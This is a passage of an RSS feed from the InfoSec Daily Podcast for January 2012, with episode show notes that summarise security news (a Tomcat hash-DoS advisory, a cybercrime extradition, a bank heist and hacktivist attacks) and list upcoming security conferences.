<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.softpedia.com/news/Apache-Tomcat-Users-Advised-to-Update-to-Avoid-Hash-DOS-Attacks-247187.shtml"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/Apache-Tomcat-Users-Advised-to-Update-to-Avoid-Hash-DOS-Attacks-247187.shtml</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Apache Software developers released an advisory, recommending customers to update their Apache Tomcat software to protect themselves against potential hash denial of service (DOS) attacks.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Analysis of the recent hash collision vulnerability identified unrelated inefficiencies with Apache Tomcat&#39;s handling of large numbers of parameters and parameter values,&rdquo; reads the</span><a href="http://mail-archives.apache.org/mod_mbox/tomcat-announce/201201.mbox/4F155CE2.3060301@apache.org"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> advisory</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;These inefficiencies could allow an attacker, via a specially crafted request, to cause large amounts of CPU to be used which in turn could create a denial of service.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In the latest releases, the issue was addressed by changing the parameter handling code to process large number of parameters and their values more efficiently.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Users who rely on Tomcat versions between 7.0.0 and 7.0.22, the ones that utilize Tomcat 6.0.33 and earlier variants, and customers of Tomcat 5.5.34 and prior are advised to immediately update to the latest versions that mitigate the threat.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We&#39;ll take this opportunity to remind everyone that starting with September 30, 2012, the company will no longer offer support for Apache Tomcat 5.5.x.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This implies that after the aforementioned date, releases from this branch are highly unlikely to be launched and bugs that affect only these variants are no longer addressed.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.theregister.co.uk/2012/01/18/russian_cybercrime_suspect_deported/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2012/01/18/russian_cybercrime_suspect_deported/</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A suspected Russian cyber-crook has arrived in the US to face charges of security fraud, computer hacking and ID theft following his deportation from Switzerland.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vladimir Zdorovenin, 54, of Moscow, Russia, is alleged to have masterminded a series of credit card theft and stock manipulation scams in conjunction with his son, Kirill Zdorovenin, who has not been apprehended.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Both were charged in May 2007, long before Zdorovenin senior was cuffed in Zurich last March. He was deported this week just before a scheduled appearance at a Manhattan federal court on Tuesday.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to the FBI, the duo&#39;s stock in trade allegedly involved hacking into computers in order to steal credit card details and brokerage account log-ins. The pair would then allegedly run a series of complicated frauds netting hundreds of thousands of dollars. The FBI said that compromised credit account details &ndash; lifted using malware &ndash; were used to make fictitious fraudulent purchases to shell companies allegedly established by the suspects, while compromised brokerage accounts were used to purchase shares held by the pair at ramped-up (artificially inflated) prices.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The father-and-son suspects are accused of frauds which targeted US consumers and ran during 2004 and 2005, according to an FBI</span><a href="http://www.fbi.gov/newyork/press-releases/2012/manhattan-u.s.-attorney-and-fbi-assistant-director-in-charge-announce-extradition-of-russian-citizen-to-face-charges-for-international-cyber-crimes"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> statement</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> on the case.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">FBI assistant director Janice K Fedarcyk explains in the statement: &quot;Zdorovenin&rsquo;s egregious behavior illustrated the true colors of the cyber underground, as he and his son allegedly defrauded consumers of hundreds of thousands of dollars using methods that included compromised credit cards, all fronted through fictitious companies they had created. In addition, Zdorovenin allegedly installed malware to access victims&rsquo; brokerage accounts, trading victims&#39; securities and manipulating the price of stocks Zdorovenin already owned.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.techworld.com/security/3330958/gang-pulls-off-52-million-bank-job-via-remote-access"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.techworld.com/security/3330958/gang-pulls-off-52-million-bank-job-via-remote-access</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Criminals in South Africa have carried off a cunning remote access heist that has left one of the country&#39;s banks nursing a stunning $5.2 million (42 million Rand) loss.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">After opening accounts at the South African Postbank months in advance, between 1 and 3 January the gang remotely accessed the computers of two employees using valid logins which were linked to the money transfer system.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Large sums of money were then moved to the mule accounts before being withdrawn from ATMs across the country as cash.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; </span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The transfers were apparently not picked up by the internal fraud detection system which might have had something to do with the fact that the period of the theft coincided with a New Year holiday.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Zambian-based</span><a href="http://www.timeslive.co.za/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Sunday Times</span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> newspaper</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> quoted an unnamed source willing to point the finger at poor IT.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The Postbank network and security systems are shocking and in desperate need of an overhaul. This [the bank theft] was always going to be a very real possibility,&quot; the source said.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.computerweekly.com/news/2240114040/Israeli-hackers-attack-Arab-stock-exchanges"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerweekly.com/news/2240114040/Israeli-hackers-attack-Arab-stock-exchanges</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Israeli hackers claim to have attacked the websites of stock exchanges in Saudi Arabia and Abu Dhabi in retaliation for cyber attacks on the Tel Aviv Stock Exchange website.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Israeli group, calling itself IDF Team, said it was also responding to cyber attacks on the websites of the national airline El Al and several Israeli bank websites.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The group&rsquo;s name is believed to refer to the acronym for the Israel Defence Forces, according to the</span><a href="http://www.ft.com/cms/s/0/7981c42a-4142-11e1-936b-00144feab49a.html?ftcamp=rss#axzz1jmqv9j00"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> Financial Times</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The cyber attacks come a week after an Israeli hacker, calling himself Hannibal, published personal information of thousands of Saudi Facebook users. The hacker claims to have acted in response to the Israeli credit card hack by Saudi-based hacker OxOmar, who exposed the details of 15,000 credit cards after breaking into the companies responsible for maintaining the information.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The cyber attacks and counter attacks look set to escalate, with the IDF Team warning that if attacks from Saudi Arabia continue, they will &ldquo;move to the next level which will disable these sites longer term [and] may come to weeks or even months.&rdquo;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Earlier this month, Danny Ayalon, Israel&rsquo;s foreign minister, said the credit card hack by OxOmar was comparable to terrorism and vowed to respond forcefully.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Israel has active capabilities for striking at those who are trying to harm it and no agency or hacker will be immune from retaliatory action,&quot; he said.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Israeli credit card companies have dismissed the financial damage as minimal, but security experts have expressed concern about the potential use of stolen information by Israel&rsquo;s enemies.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Islamist group Hamas has described OxOmar&#39;s actions as &quot;a new form of resistance&quot;. Hamas urged Arab youth to use all means available in the virtual space to &ldquo;confront Israeli crimes&quot;, according to reports.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://thenextweb.com/insider/2012/01/18/how-much-would-facebook-google-or-twitter-lose-if-they-shut-down-for-one-day/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://thenextweb.com/insider/2012/01/18/how-much-would-facebook-google-or-twitter-lose-if-they-shut-down-for-one-day/</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">With Wikipedia going through with its decision to shut down the site for 24 hours as part of their protest against SOPA, it&rsquo;s received quite a bit of criticism in the process for the decision. The Next Web&rsquo;s own Brad McCarty gave a pretty good argument for how Wikipedia could have used its site to raise awareness, in the same way it was able to raise money for its own cause.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Of course the Wikimedia Foundation doesn&rsquo;t have any revenue to speak of, but what if other sites had made the same decision? We&rsquo;ve put together a list of some of the Web&rsquo;s major sites and figured out approximately how much they stood to lose, based on their annual revenue, if they had followed in Wikipedia&rsquo;s footsteps.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-571-pentest-lessons-apachetomcat-hash-attack-muscovite-bank-remote-access-attacking-the-exchanges-cost-of-shutdown/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3392/0/infosec-daily-podcast-episode-571.mp3" length="18594313" type="audio/mpeg" />
		<itunes:duration>0:38:41</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 571 for January 18, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan &#38; Geordy Rostad.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 571 for January 18, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan &#38; Geordy Rostad.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	New England InfoSec Tweetup
	When: January 21, 2012
	Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH
	http://neistu3.eventbrite.com/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	http://shmooconepilogue.eventbrite.com/
	 
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	BSides Chicago
	When: Saturday, April 28th, 2012
	Where: Volcano Room (further info coming)
	Cost: Free (as always!) &#8211; Registration opening soon!
	http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012
	They&#8217;re looking for sponsors, so if you know someone, pass it on.
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 570 &#8211; Blackout, No UEFI, Register HiJack, Targeting Kids, Dude Where’s My Twitter, iPhone 4S Jailbreak Near, &amp; Windows Cloud</title>
		<link>http://www.isdpodcast.com/episode-570-blackout-no-uefi-register-hijack-targeting-kids-dude-wheres-my-twitter-iphone-4s-jailbreak-near-windows-cloud</link>
		<comments>http://www.isdpodcast.com/episode-570-blackout-no-uefi-register-hijack-targeting-kids-dude-wheres-my-twitter-iphone-4s-jailbreak-near-windows-cloud#comments</comments>
		<pubDate>Wed, 18 Jan 2012 01:56:38 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3387</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 570 for January 17, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Themson Mester. &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 570 for January 17, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Themson Mester.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#222222;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anti PIPA/SOPA Meetup</span><br />
	<span style="font-size:15px;font-family:Arial;color:#222222;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 18, 2012<br class="kix-line-break" /><br />
	Where: NY Tech Meetup HQ, New York City</span><br />
	<a href="http://www.meetup.com/ny-tech/events/47879702/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.meetup.com/ny-tech/events/47879702/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New England InfoSec Tweetup</span><br />
